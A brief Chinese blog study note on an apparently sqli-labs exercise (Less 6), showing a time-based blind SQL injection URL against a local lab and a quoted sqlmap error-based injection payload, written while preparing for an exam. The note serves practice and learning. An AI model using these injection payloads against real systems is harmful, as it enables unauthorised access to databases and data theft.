Less 6

这道题也是简单地批爆
就是基于时间盲注，并且睡眠时间是延长了10倍而已。

http://127.0.0.1/Less-6/?id=1.1" or if((length(database())%3C5),sleep(0.3),0)%20--+

sqlmap跑一跑。

但是我使用sqlmap的时候，发现sqlmap有一种报错注入，看得我不是很懂，
他的payload是：
id=1" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71766a6a71,(SELECT (ELT(5957=5957,1))),0x716b786a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- XkEt

尝试后是这样子的：

看得我不是很明白，但是这次是为了备考pte的，时间有限，先不纠结这个点了，这个姿势后来我考完之后，在琢磨琢磨。

要备注一下，博客园有待后续这个提醒选项么，把这篇笔记设置为有待处理知识点.......

相关阅读:
从OkHttp的源码来看 HTTP
从Retrofit的源码来看 HTTP
登录授权、TCP/IP、HTTPS
编码、加密、Hash
java获取当前系统时间
mybatis自动生成
rabbitMQ权限相关命令
在Spring Boot中使用Spring Security实现权限控制
学习sharding-jdbc 分库分表扩展框架
Jenkins的关闭、重启

原文地址：https://www.cnblogs.com/miniboom/p/11981401.html